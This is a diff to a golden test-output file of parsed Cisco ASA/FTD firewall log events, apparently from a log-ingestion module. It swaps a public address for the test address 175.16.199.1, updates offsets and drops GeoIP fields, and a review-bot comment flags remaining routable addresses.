@@ -4,7 +4,7 @@ "cisco.asa.destination_interface": "fw111", "cisco.asa.mapped_destination_ip": "8.8.5.4", "cisco.asa.mapped_destination_port": 53500, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.mapped_source_port": 53500, "cisco.asa.message_id": "302013", "cisco.asa.source_interface": "net", @@ -20,7 +20,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "event.original": "%FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ 
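Review bot: The rewritten %ASA-3-710003 line replaces its source address but keeps `outside:195.74.114.34/23`, a routable destination, so that event will still carry a real third-party address into `destination.ip`/`related.ip`; the same applies to `Group = 100.60.140.10` on the %ASA-5-713120, 713905, 713902, 713901 and 713049 lines, which sits below 100.64.0.0/10 and is therefore public (unlike `100.66.124.24` on the %ASA-4-106023 line, which is inside the shared-address block). Moving both into the test blocks already used here, for example `to outside:67.43.156.14/23`, would finish the job and keep the golden file independent of the GeoIP database in use. I am assuming the Group value is parsed as an IP by the pipeline; if it is only kept as an opaque string, the second point is cosmetic.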
@@ -46,14 +46,14 @@ ], "related.ip": [ "10.10.10.10", + "175.16.199.1", "192.168.2.2", - "8.8.5.4", - "8.8.8.8" + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", "source.ip": "10.10.10.10", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "source.port": 53500, "tags": [ "cisco-asa", @@ -65,7 +65,7 @@ "cisco.asa.destination_interface": "fw111", "cisco.asa.mapped_destination_ip": "8.8.5.4", "cisco.asa.mapped_destination_port": 53500, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.mapped_source_port": 53500, "cisco.asa.message_id": "302015", "cisco.asa.source_interface": "net", @@ -81,7 +81,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "event.original": "%FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (175.16.199.1/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -91,7 +91,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 162, + "log.offset": 167, "network.community_id": "1:IVpSg0ysDmubwwgwjXBIZ47C7h0=", "network.direction": "inbound", "network.iana_number": 17, @@ -107,14 +107,14 @@ ], "related.ip": [ "10.10.10.10", + "175.16.199.1", "192.168.2.2", - "8.8.5.4", - "8.8.8.8" + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", "source.ip": "10.10.10.10", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "source.port": 53500, "tags": [ "cisco-asa", 
@@ -124,7 +124,7 @@ { "cisco.asa.icmp_code": 3, "cisco.asa.icmp_type": 3, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", "destination.ip": "10.10.10.10", @@ -136,7 +136,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -147,7 +147,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 324, + "log.offset": 334, "network.direction": "inbound", "network.protocol": "icmp", "observer.hostname": "dev01", @@ -159,13 +159,13 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2", - "8.8.8.8" + "175.16.199.1", + "192.168.2.2" ], "service.type": "cisco", "source.address": "192.168.2.2", "source.ip": "192.168.2.2", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "tags": [ "cisco-asa", "forwarded" @@ -196,7 +196,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 466, + "log.offset": 481, "observer.hostname": "dev01", "observer.ingress.interface.name": "net", "observer.product": "asa", @@ -238,7 +238,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 557, + "log.offset": 572, "observer.hostname": "dev01", "observer.ingress.interface.name": "net", "observer.product": "asa", @@ -261,7 +261,7 @@ { "cisco.asa.icmp_code": 1, "cisco.asa.icmp_type": 3, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", "destination.ip": "10.10.10.10", 
@@ -273,7 +273,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1", + "event.original": "%FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 1", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -284,7 +284,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 628, + "log.offset": 643, "network.direction": "inbound", "network.protocol": "icmp", "observer.hostname": "dev01", @@ -296,13 +296,13 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2", - "8.8.8.8" + "175.16.199.1", + "192.168.2.2" ], "service.type": "cisco", "source.address": "192.168.2.2", "source.ip": "192.168.2.2", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "tags": [ "cisco-asa", "forwarded" @@ -313,7 +313,7 @@ "cisco.asa.destination_interface": "fw111", "cisco.asa.mapped_destination_ip": "8.8.5.4", "cisco.asa.mapped_destination_port": 111, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.mapped_source_port": 111, "cisco.asa.message_id": "805001", "cisco.asa.source_interface": "fw111", @@ -329,7 +329,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)", + "event.original": "%FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (175.16.199.1/111) to fw111:192.168.2.2/111 (8.8.5.4/111)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ 
@@ -339,7 +339,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 770, + "log.offset": 790, "network.community_id": "1:fZKugXq2jG4PzddJfuy6XDBSNb4=", "network.iana_number": 6, "network.transport": "tcp", @@ -354,14 +354,14 @@ ], "related.ip": [ "10.10.10.10", + "175.16.199.1", "192.168.2.2", - "8.8.5.4", - "8.8.8.8" + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", "source.ip": "10.10.10.10", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "source.port": 111, "tags": [ "cisco-asa", @@ -398,7 +398,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 932, + "log.offset": 957, "network.community_id": "1:RAjPAJDWj8kCZQnmEJzqMl9E6h8=", "network.iana_number": 6, "network.transport": "tcp", @@ -450,7 +450,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 1119, + "log.offset": 1144, "network.community_id": "1:7GE6gaRtd6w4KEJWhDLHwfgp1Do=", "network.iana_number": 17, "network.transport": "udp", @@ -502,7 +502,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 1223, + "log.offset": 1248, "network.protocol": "ftp", "observer.egress.interface.name": "fw111", "observer.hostname": "dev01", @@ -546,7 +546,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 1396, + "log.offset": 1421, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -571,7 +571,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.", + "event.original": "%FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 175.16.199.1/10872.", "event.severity": 4, "event.timezone": "-02:00", "event.type": [ @@ -581,7 +581,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 1492, + "log.offset": 1517, "network.iana_number": 1, "network.transport": "icmp", "observer.hostname": "dev01", @@ -601,7 +601,7 @@ { "cisco.asa.icmp_code": 0, "cisco.asa.icmp_type": 8, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.message_id": "302021", "destination.address": "192.168.2.2", "destination.ip": "192.168.2.2", @@ -613,7 +613,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0", + "event.original": "%ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 175.16.199.1/2 laddr 10.10.10.10/2 type 8 code 0", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -624,7 +624,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 1722, + "log.offset": 1752, "network.community_id": "1:adLbp2MSbpgtKlYEN938sSARKPs=", "network.iana_number": 1, "network.transport": "icmp", 
@@ -637,13 +637,13 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2", - "8.8.8.8" + "175.16.199.1", + "192.168.2.2" ], "service.type": "cisco", "source.address": "10.10.10.10", "source.ip": "10.10.10.10", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "tags": [ "cisco-asa", "forwarded" @@ -671,7 +671,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 1859, + "log.offset": 1894, "observer.hostname": "dev01", "observer.ingress.interface.name": "net", "observer.product": "asa", @@ -716,7 +716,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 1930, + "log.offset": 1965, "observer.hostname": "dev01", "observer.ingress.interface.name": "identity", "observer.product": "asa", @@ -737,7 +737,7 @@ ] }, { - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", "destination.ip": "10.10.10.10", @@ -749,7 +749,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0", + "event.original": "%ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 10.192.46.90/0", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -760,7 +760,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2026, + "log.offset": 2061, "network.direction": "inbound", "network.protocol": "icmp", "observer.hostname": "dev01", @@ -773,12 +773,12 @@ "related.ip": [ "10.10.10.10", "10.192.46.90", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "source.address": "10.192.46.90", "source.ip": "10.192.46.90", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "tags": [ "cisco-asa", "forwarded" 
@@ -787,7 +787,7 @@ { "cisco.asa.icmp_code": 3, "cisco.asa.icmp_type": 3, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", "destination.ip": "10.10.10.10", @@ -799,7 +799,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "event.original": "%ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 175.16.199.1/0 laddr 192.168.2.2/0 type 3 code 3", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -810,7 +810,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2155, + "log.offset": 2195, "network.direction": "outbound", "network.protocol": "icmp", "observer.hostname": "dev01", @@ -822,13 +822,13 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2", - "8.8.8.8" + "175.16.199.1", + "192.168.2.2" ], "service.type": "cisco", "source.address": "192.168.2.2", "source.ip": "192.168.2.2", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "tags": [ "cisco-asa", "forwarded" @@ -865,7 +865,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2298, + "log.offset": 2343, "network.bytes": 0, "network.community_id": "1:4wndP8OTPk0tlCwv5mj9vURDLQ0=", "network.iana_number": 6, 
@@ -895,15 +895,15 @@ { "cisco.asa.connection_id": "1588662", "cisco.asa.destination_interface": "net", - "cisco.asa.mapped_destination_ip": "8.8.8.8", + "cisco.asa.mapped_destination_ip": "175.16.199.1", "cisco.asa.mapped_destination_port": 54839, - "cisco.asa.mapped_source_ip": "8.8.8.8", + "cisco.asa.mapped_source_ip": "175.16.199.1", "cisco.asa.mapped_source_port": 80, "cisco.asa.message_id": "302013", "cisco.asa.source_interface": "intfacename", "destination.address": "10.10.10.10", "destination.ip": "10.10.10.10", - "destination.nat.ip": "8.8.8.8", + "destination.nat.ip": "175.16.199.1", "destination.port": 54839, "event.action": "firewall-rule", "event.category": [ @@ -913,7 +913,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)", + "event.original": "%ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (175.16.199.1/80) to net:10.10.10.10/54839 (175.16.199.1/54839)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -923,7 +923,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2462, + "log.offset": 2507, "network.community_id": "1:N0ZlFq5yxkndvN9h3uigv6XgVms=", "network.direction": "outbound", "network.iana_number": 6, @@ -939,13 +939,13 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2", - "8.8.8.8" + "175.16.199.1", + "192.168.2.2" ], "service.type": "cisco", "source.address": "192.168.2.2", "source.ip": "192.168.2.2", - "source.nat.ip": "8.8.8.8", + "source.nat.ip": "175.16.199.1", "source.port": 80, "tags": [ "cisco-asa", 
@@ -981,7 +981,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2623, + "log.offset": 2678, "network.community_id": "1:PyQWTuzAdzYav2//+TQFcJTt2os=", "network.iana_number": 17, "network.transport": "udp", @@ -1033,7 +1033,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 2768, + "log.offset": 2823, "network.community_id": "1:adLbp2MSbpgtKlYEN938sSARKPs=", "network.iana_number": 1, "network.transport": "icmp", @@ -1082,7 +1082,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 2904, + "log.offset": 2959, "network.community_id": "1:hoENwaIuofrQAf7gW+y4f0XXbxc=", "network.iana_number": 6, "network.transport": "tcp", @@ -1134,7 +1134,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "critical", - "log.offset": 3029, + "log.offset": 3084, "network.community_id": "1:+xI89PlchTpu6dxTMHpkmkd99Ns=", "network.direction": "inbound", "network.iana_number": 6, @@ -1166,16 +1166,6 @@ "cisco.asa.message_id": "302016", "cisco.asa.source_interface": "intfacename", "destination.address": "192.186.2.2", - "destination.as.number": 395776, - "destination.as.organization.name": "FEDERAL ONLINE GROUP LLC", - "destination.geo.city_name": "Thousand Oaks", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 34.197, - "destination.geo.location.lon": -118.8199, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "192.186.2.2", "destination.port": 53356, "event.action": "flow-expiration", @@ -1200,7 +1190,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "critical", - "log.offset": 3172, + "log.offset": 3227, "network.bytes": 64585, "network.community_id": "1:eOIoJBMMmanddR7cRZ0I9vTVI7o=", "network.iana_number": 17, 
@@ -1230,7 +1220,7 @@ { "cisco.asa.connection_id": "1743372", "cisco.asa.destination_interface": "net", - "cisco.asa.mapped_destination_ip": "8.8.8.8", + "cisco.asa.mapped_destination_ip": "175.16.199.1", "cisco.asa.mapped_destination_port": 22638, "cisco.asa.mapped_source_ip": "8.8.8.4", "cisco.asa.mapped_source_port": 161, @@ -1238,7 +1228,7 @@ "cisco.asa.source_interface": "intfacename", "destination.address": "192.168.2.2", "destination.ip": "192.168.2.2", - "destination.nat.ip": "8.8.8.8", + "destination.nat.ip": "175.16.199.1", "destination.port": 22638, "event.action": "firewall-rule", "event.category": [ @@ -1248,7 +1238,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)", "event.severity": 2, "event.timezone": "-02:00", "event.type": [ @@ -1258,7 +1248,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "critical", - "log.offset": 3328, + "log.offset": 3383, "network.community_id": "1:QsMj86uzy+H1c1pPwrevpSOTh6Q=", "network.direction": "outbound", "network.iana_number": 17, @@ -1274,9 +1264,9 @@ ], "related.ip": [ "10.10.10.10", + "175.16.199.1", "192.168.2.2", - "8.8.8.4", - "8.8.8.8" + "8.8.8.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1291,7 +1281,7 @@ { "cisco.asa.connection_id": "1743372", "cisco.asa.destination_interface": "net", - "cisco.asa.mapped_destination_ip": "8.8.8.8", + "cisco.asa.mapped_destination_ip": "175.16.199.1", "cisco.asa.mapped_destination_port": 22638, "cisco.asa.mapped_source_ip": "8.8.8.4", "cisco.asa.mapped_source_port": 161, 
@@ -1299,7 +1289,7 @@ "cisco.asa.source_interface": "intfacename", "destination.address": "192.168.2.2", "destination.ip": "192.168.2.2", - "destination.nat.ip": "8.8.8.8", + "destination.nat.ip": "175.16.199.1", "destination.port": 22638, "event.action": "firewall-rule", "event.category": [ @@ -1309,7 +1299,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)", "event.severity": 2, "event.timezone": "-02:00", "event.type": [ @@ -1319,7 +1309,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "critical", - "log.offset": 3491, + "log.offset": 3551, "network.community_id": "1:QsMj86uzy+H1c1pPwrevpSOTh6Q=", "network.direction": "outbound", "network.iana_number": 17, @@ -1335,9 +1325,9 @@ ], "related.ip": [ "10.10.10.10", + "175.16.199.1", "192.168.2.2", - "8.8.8.4", - "8.8.8.8" + "8.8.8.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1377,7 +1367,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 3654, + "log.offset": 3719, "network.community_id": "1:mPK7q/c5ZVhrh2fX6Uqp5314u3M=", "network.iana_number": 6, "network.transport": "tcp", @@ -1428,7 +1418,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 3818, + "log.offset": 3883, "network.iana_number": 6, "network.transport": "tcp", "observer.hostname": "dev01", @@ -1477,7 +1467,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "critical", - "log.offset": 3935, + "log.offset": 4000, "network.community_id": "1:CQXm0MA6TgkTzvcatvgQvikqqes=", "network.direction": "inbound", "network.iana_number": 17, 
@@ -1529,7 +1519,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4053, + "log.offset": 4118, "network.community_id": "1:CctaOB5wLrJrIATPwYjXODlSpRk=", "network.iana_number": 6, "network.transport": "tcp", @@ -1580,7 +1570,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4197, + "log.offset": 4262, "network.community_id": "1:ghA7Jv5D0sCP4HhHb948hjqh3H4=", "network.iana_number": 6, "network.transport": "tcp", @@ -1631,7 +1621,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4337, + "log.offset": 4402, "network.community_id": "1:daEI7UiyuAFNVP1xsUsb/AHJ/1I=", "network.iana_number": 6, "network.transport": "tcp", @@ -1671,7 +1661,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -1681,7 +1671,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4472, + "log.offset": 4537, "network.community_id": "1:1Rjth0DOphFZyLUBP572S4VdEu0=", "network.iana_number": 6, "network.transport": "tcp", @@ -1722,7 +1712,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ 
@@ -1732,7 +1722,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4631, + "log.offset": 4701, "network.community_id": "1:1Rjth0DOphFZyLUBP572S4VdEu0=", "network.iana_number": 6, "network.transport": "tcp", @@ -1773,7 +1763,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (175.16.199.1/10051)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -1783,7 +1773,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4791, + "log.offset": 4866, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "net", @@ -1837,7 +1827,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 4949, + "log.offset": 5029, "network.bytes": 0, "network.community_id": "1:A692g/lxHLbLsT0d0M1RFfiHIs0=", "network.iana_number": 6, @@ -1893,7 +1883,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 5142, + "log.offset": 5222, "network.bytes": 0, "network.community_id": "1:pcILvYGm5J7rxuqU5/TRGZGGe3E=", "network.iana_number": 6, @@ -1941,7 +1931,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 5369, + "log.offset": 5449, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -1980,7 +1970,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 5476, + "log.offset": 5556, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -2026,7 +2016,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 5571, + "log.offset": 5651, "network.community_id": "1:XgYjYk8hbPPlEnBcHqCD172wQQE=", "network.iana_number": 6, "network.transport": "tcp", @@ -2080,7 +2070,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 5743, + "log.offset": 5823, "network.community_id": "1:a99mceIcFv0NTz6Aw/+bwE1TnPA=", "network.iana_number": 6, "network.transport": "tcp", @@ -2126,7 +2116,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 5922, + "log.offset": 6002, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2150,7 +2140,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)", + "event.original": "%ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (175.16.199.1)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -2160,7 +2150,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 6113, + "log.offset": 6193, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2200,7 +2190,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "debug", - "log.offset": 6256, + "log.offset": 6341, "network.community_id": "1:pXZbIlTv2J4XdRhqORC4IQqpKKg=", "network.iana_number": 17, "network.transport": "udp", @@ -2245,7 +2235,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 6362, + "log.offset": 6447, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -2269,7 +2259,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)", + "event.original": "%ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (175.16.199.1/123)", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -2279,7 +2269,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 6571, + "log.offset": 6656, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2319,7 +2309,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "error", - "log.offset": 6722, + "log.offset": 6812, "network.community_id": "1:4MHSMLtBw+4q7Wke3ztBRVwtgt0=", "network.direction": "inbound", "network.iana_number": 1, @@ -2371,7 +2361,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 6838, + "log.offset": 6928, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2412,7 +2402,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "error", - "log.offset": 7071, + "log.offset": 7161, "network.community_id": "1:frDwW4LN1XFwCsYClx5AmXSlEBE=", "network.direction": "inbound", "network.transport": "sctp", @@ -2462,7 +2452,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 7178, + "log.offset": 7268, "network.community_id": "1:gZP3lWRSgL55d5cZvFu18yXen5M=", "network.iana_number": 6, "network.transport": "tcp", @@ -2512,7 +2502,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 7351, + "log.offset": 7441, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
